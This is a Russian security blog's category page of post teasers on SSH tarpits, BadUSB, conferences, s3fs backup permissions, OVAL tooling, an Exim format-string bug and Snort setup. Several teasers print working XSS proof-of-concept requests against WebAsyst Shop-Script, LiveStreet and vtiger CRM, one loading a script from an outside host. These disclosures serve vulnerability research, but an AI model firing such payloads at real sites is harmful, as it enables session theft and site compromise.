Программы для безопасости вторжений, сетевые сканеры, IDS
  • Дата создания
    23 июля 2010
  • Топиков
    20
  • Ограничение на постинг
    0.000

Ловушка (тарпит) для входящих SSH-соединений

Tarpit — это порт-ловушка, который используется для замедления входящих соединений. Если сторонняя система подключается к этому порту, то быстро закрыть соединение не получится. Ей придётся тратить свои системные ресурсы и ждать, пока соединение не прервётся по таймауту, или вручную разрывать его.

Чаще всего тарпиты применяют для защиты. Технику впервые разработали для защиты от компьютерных червей. А сейчас её можно использовать, чтобы испортить жизнь спамерам и исследователям, которые занимаются широким сканированием всех IP-адресов подряд (примеры на Хабре: Австрия, Украина).
Читать дальше

Уязвимость BadUSB для Phison 2251-03 (часть 1)

Узнал об этом еще с английской рассылки SANS Vol. 16 Num. 79.
Собирался первым перевести на русский язык(на github и так написаны команды ) и разобраться с этим еще 4 октября, но дела не позволяли потратить на это время и денег на поиски конкретной флешки не было.
В итоге найдя единственный магазин в городе где были эти флешки Kingston DataTraveler 3.0 T111 8GB зайдя в него и уговаривая продавцов вскрыть упаковку не получилось. Пришлось купить наугад. И мы угадали и купили нужную проверив на ноутбуке в магазине. Контроллер оказался PS2251-03 (2303). У нас была куча неописуемой радости и везения!!! В магазине оставалось всего 9 флешек данной модели…

Читать дальше

ZeroNights 2014

Так уж вышло, что конференция выпала на моё День Рождения. И наверно это был самый большой подарок.

Вот наконец то выехал куда то со своего города. Купил билеты еще так давно как можно было. И на поезд заранее купил чтоб отступать было некуда. Пришлось сдвигать все планы, клиентов, всех торопить и собирать к этому числу денег. Но даже при таком учете я вернулся на занятые денег у клиентов. ))) Пришлось отрабатывать. Да и не просто так поехал в Москву, а по делам, почта России потеряла 2 договора, за 3 месяца не дождавшись их привез лично в руки. Но что то клиент где то пропал.

Все было круто, хостел новый взял, народ был тоже интересный. Встречал иностранцев, писателей. Опять понял что надо знать английский, хотя мне и без него хорошо живется. Опять по влюблялся пару раз и забыл уже в кого.

Читать дальше

WebAsyst Shop-Script v.307 XSS

ХSS происходит при передаче в параметр EMAIL — html-кода, где мы можем вызвать iframe с вредоносным скриптом.

WebAsyst Shop-Script

POST /published/forgot.php HTTP/1.1
Content-Length: 210
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=9bae5994ebe0dd6b6fe023506dde2c32; csd=5; cod=3.5.9
Host: SITE.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

C=&edited=1&enter=%d0%9e%d1%82%d0%bf%d1%80%d0%b0%d0%b2%d0%b8%d1%82%d1%8c&userdata%5bDB_KEY%5d=PROSTITUTKI&userdata%5bEMAIL%5d=%22%20><iframe src="http://himic.ru/xss.html"><div%20bad%3d%22&userdata%5bU_ID%5d=01%2f01%2f1967
Читать дальше

Livestreet 0.5.1 и в 0.4, XSS, Cross Site Scripting, раскрытие директории

LiveStreet XSS
Livestreet XSS + раскрытие директории в MooTools_1.2, vlaCal-v2.1

Фаил: decade.php
POST /engine/lib/external/MooTools_1.2/plugs/vlaCal-v2.1/inc/decade.php HTTP/1.1
Content-Length: 53
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=8223940c401233bbcffe59d6f2b7637d; _metrika_enabled=
Host: blog.himic.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

ts=%22%20BACKGROUND%3djavascript:alert%28document.cookie%29%20bad%3d%22

Читать дальше

Бэкапы на Amazon s3fs права доступа при подключении диска

К примеру в статье habrahabr.ru/post/111555/ используется строчка подключения диска
s3fs your-bucket-name /mnt/backup -o allow_other,retries=10,connect_timeout=30,readwrite_timeo


Если примонтировать S3 под root то к разделу /mnt/backup будут иметь доступ пользователи сервера в том числе и через PHP скрипты(или запущенные шеллы Perl, C).

Таким образом пользователи или какой-нибудь сайт на WordPress может послужить огромной опасностью.

Правильно:
Параметр Если без параметра allow_other примонтировать S3 диск, то доступ к диску будет возможен только тому пользователю кто его примонтировал.

Соответственно и бекапы надо делать под пользователем под которым подключили диск.
У меня OS Debian 5 + ISPmanager

Проверьте пожалуйста и у вас доступен ли каталог Amazon для простых пользователей.
А то получается что простые пользователи могут уничтожить все бекапы и вы останетесь без них.

PS:
При присутствующем параметре allow_other — установка UNIX прав 0600 на фаилы и каталоги не действуют.
Монтирование диска с параметрами RW, UID=, GID= тоже недействуют.
s3fs your-bucket-name /mnt/backup -o retries=10,connect_timeout=30,readwrite_timeout=30,uid=0,gid=0


PS:
данная ошибка будет возникать если вы пытаетесь примонтировать диск не под пользователем которому разрешено читать /etc/passwd-s3fs
s3fs: could not determine how to establish security credentials
Читать дальше

Реализация инструментов для создания контента OVAL на Python

Open Vulnerability and Assessment Language
Данный модуль позволяет выполнять сборку секьюрити-контента и «упаковку» его в базу данных с контролем версий и уникальности идентификаторов.

В процессе исследования языка OVAL, про который написано ранее в одной из статей, и концепции SCAP-сканера мы столкнулись с довольно серьезной проблемой, а именно с отсутствием удобных инструментов для создания контента на языке OVAL. Нет, мы не утверждаем, что нет совсем ничего. Есть небольшой набор утилит, представленных на официальном сайте. Большая часть из них платная, остальные же представляют собой не очень удобные решения, больше всего похожие на XML-Notepad. В итоге мы решили создать небольшой необходимый для работы инструмент самостоятельно, используя в качестве языка Python
Читать дальше

CVE-2011-1764: Уязвимость Exim DKIM Signatures Remote Format String

Пару минут назад я заметил, этот твит Джошуа Дж. Дрейк (ака jduck). Это действительно интересная уязвимость Exim MTA. Так что, как мы можем прочитать в отчете об ошибке, проблема о которой сообщил Джон Р. Левин, как неправильное толкование DKIM подписи. Более пристальный взгляд в src/dkim.c показывает, что это был классическая уязвимость форматной строки.

void dkim_exim_verify_finish(void) {
   pdkim_signature *sig = NULL;
   int dkim_signers_size = 0;
   int dkim_signers_ptr = 0;
   dkim_signers = NULL;
 
   /* Delete eventual previous signature chain */
   dkim_signatures = NULL;
 ...
     /* Log a line for each signature */
     uschar *logmsg = string_append(NULL, &size, &ptr, 5,
 
      string_sprintf( "DKIM: d=%s s=%s c=%s/%s a=%s ",
                      sig->domain,
                      sig->selector,
                      (sig->canon_headers == PDKIM_CANON_SIMPLE)?"simple":"relaxed",
                      (sig->canon_body    == PDKIM_CANON_SIMPLE)?"simple":"relaxed",
                      (sig->algo          == PDKIM_ALGO_RSA_SHA256)?"rsa-sha256":"rsa-sha1"
                    ),
 ...
    logmsg[ptr] = '\0';
    log_write(0, LOG_MAIN, (char *)logmsg);
 ...
  }
}

Как вы можете ясно видеть, буфер (logmsg) передается log_write() получается из (partially) контролируемой пользователем данных. Поскольку не существует спецификатора форматной строки в log_write(), пользователь получает возможность инициировать общюю уязвимость форматной строки с использованием таких указателей. Исправление было совершенно очевидно…

-    log_write(0, LOG_MAIN, (char *)logmsg);
+    log_write(0, LOG_MAIN, "DKIM: %s", logmsg);


Кроме того, поскольку «DKIM:» строка была перенесена в log_write() он был удален из исходного string_sprint(), показанный ранее…
-      string_sprintf( "DKIM: d=%s s=%s c=%s/%s a=%s ",
+      string_sprintf( "d=%s s=%s c=%s/%s a=%s ",


6 мая, 2011 года
перевод гуглом с xorl.wordpress.com/2011/05/06/exim-dkim-signatures-remote-format-string/
Читать дальше

Влияет ли информационная безопасность на компании в России?

Как падали цены на акции Sony после взломов?
Вот тут написано: attrition.org/security/rant/sony_aka_sownage.html как падали цены на акции компании Sony.

Прошу заменить,
что в 2011-04-04 цена была 31.45$,
а 2011-12-19(сегодня) — 16,71$ = чистая случайность грубо говоря в 50%?

Кто-то мне сказал, что на репутацию компаний создающих сайты, такие взломы никак не влияют.
Интересно, а будут ли заказывать крупные компании, интернет магазины и финансовые компании — доверять держать персональные данные клиентов на сервере, где не уделяется внимание информационной безопасности и разработке ПО. Конечно сайты визитки клепать и верстку менять — не считается.

Стоит ли доверять разработку продукта — компании которая засветилась в небрежном отношении к прошлым своим продуктам?
Читать дальше

Конкурс по расследованию IT-инцидентов

Конкурс по расследованию IT-инцидентов

Конкурс по расследованию IT-инцидентов

Совместно с Group-IB мы проводим конкурс по компьютерной криминалистике. Победитель получит возможность работать в Лаборатории Group-IB и заниматься интересной работой по расследованию IT-инцидентов в отличной компании.

На экспертизу поступили два образа носителей информации и только вам под силу пролить свет на произошедшие инциденты. Ответьте на поставленные вопросы и укажите иные сведения, которые помогут в расследовании инцидентов информационной безопасности.
Читать дальше

PHD 2012 Positive Hack Days - международный форум, посвященный практическим вопросам информационной безопасности.

Positive Hack Days 2012Теперь хочу сюда

Сегодня как никогда остро назрела необходимость конструктивного диалога между всеми представителями сферы информационной безопасности. Поэтому мы разработали мероприятие принципиально нового формата — Positive Hack Days.

Positive Hack Days — уникальное мероприятие для не только в России, но и в мире. Только здесь элита хакерского мира, лидеры индустрии безопасности и Интернет-сообщество встречаются лицом к лицу, чтобы вместе найти ответы на самые актуальные вопросы ИТ-рынка.

Positive Hack Days — это теория, тесно переплетенная с практикой, профессиональная дискуссия в сочетании с захватывающими соревнованиями и конкурсами, максимум практики и минимум формальностей.

Читать дальше

Почти побывал на ZeroNights

ZeroNights — международная конференция, посвященная техническим аспектам информационной безопасности. На конференции выступят известные эксперты отрасли из России, США, Индии, Сингапура и других стран. Главная цель конференции — распространение информации о новых методах атак, угроз и защиты от них, а кроме того — создание площадки для общения специалистов-практиков по ИБ.

Эта конференция для технических специалистов, администраторов, руководителей и сотрудников службы ИБ, пентестеров, программистов, и всех тех, кто интересуется техническими проблемами отрасли.

Поблагодарили меня за это habrahabr.ru/company/yandex/blog/131199/

Жаль что живу от Питера и Москвы далеко. Так бы ездил на конференции.
Спасибо замечательной девушке-хакеру Проксима, за предоставленные фотки

Кликабельно
Бабичев Игорь HiMiC ZeroNights
Читать дальше

Debian snont настройка

Официальная документация по настройке www.snort.org/assets/167/deb_snort_howto.pdf

Change these lines:
Line #39 — ipvar HOME_NET 192.168.1.0/24 – make this match your internal (friendly) network
Line #42 — ipvar EXTERNAL_NET !$HOME_NET
Line #80 — var RULE_PATH ./rules – this assumes /etc/snort/rules
Line #186-#190 comment out all of the preprocessor normalize_ lines
Line #366 — add this: output unified2: filename snort.log, limit 128
Line #395 — delete or comment out all of the “include $RULE_PATH” lines except “local.rules”

для новой версии snort-2.9.1.tar.gz

Change these lines:
Line #45 — ipvar HOME_NET 192.168.1.0/24 – make this match your internal (friendly) network
Line #48 — ipvar EXTERNAL_NET !$HOME_NET
Line #98 — var RULE_PATH ./rules – this assumes /etc/snort/rules
Line #235-#239 comment out all of the preprocessor normalize_ lines
Line #471 — add this: output unified2: filename snort.log, limit 128
Line #503 — delete or comment out all of the “include $RULE_PATH” lines except “local.rules”

./configure --with-mysql --with-libpcre-libraries=/usr/src/snort/libdnet-1.12/src/.libs/ --with-dnet-includes=/usr/src/snort/libdnet-1.12/include/ --enable-build-dynamic-examples --enable-gre --enable-reload --enable-linux-smp-stats --enable-zlib --enable-dynamicplugin --enable-perfprofiling --enable-ipv6
Читать дальше

vtiger CRM 5.2.1 XSS

XSS

/include/SalesPlatform/NetIDNA/example.php/>"><ScRiPt>alert(14227)</ScRiPt>


decoded

/include/SalesPlatform/NetIDNA/example.php?decoded=%22%20onmouseover%3dprompt%28981290%29%20bad%3d%22&encode=Encode%20%3e%3e&idn_version=2003


encoded

/include/SalesPlatform/NetIDNA/example.php?decode=%3c%3c%20Decode&encoded=%22%20onmouseover%3dprompt%28937322%29%20bad%3d%22


lang


/include/SalesPlatform/NetIDNA/example.php?decode=&encode=&idn_version=&lang=%22%20onmouseover%3dprompt%28959182%29%20bad%3d%22


_operation

/modules/Mobile/index.php?_operation=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28922731%29%3c%2fScRiPt%3e


service

/vtigerservice.php?service=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28945713%29%3c%2fScRiPt%3e

Читать дальше

ИН_АТАК: перезагрузка

inattack.ruwww.inattack.ru/

Вот это и случилось — новый движок, новый дизайн и реальная возможность развиваться дальше. Конечно многое еще будет доделыватся/переделываться, но важно то, что начало этому положено!

Мы перезагрузились!

++++++++++++++++
Остается надеяться что раздел «Уязвимости» не будет отставать по времени публикования на англицких сайтах. И будут писаться статьи с чем то из оригинальных уязвимостей.

Теперь остается самое главное: наполнение контентом.
Читать дальше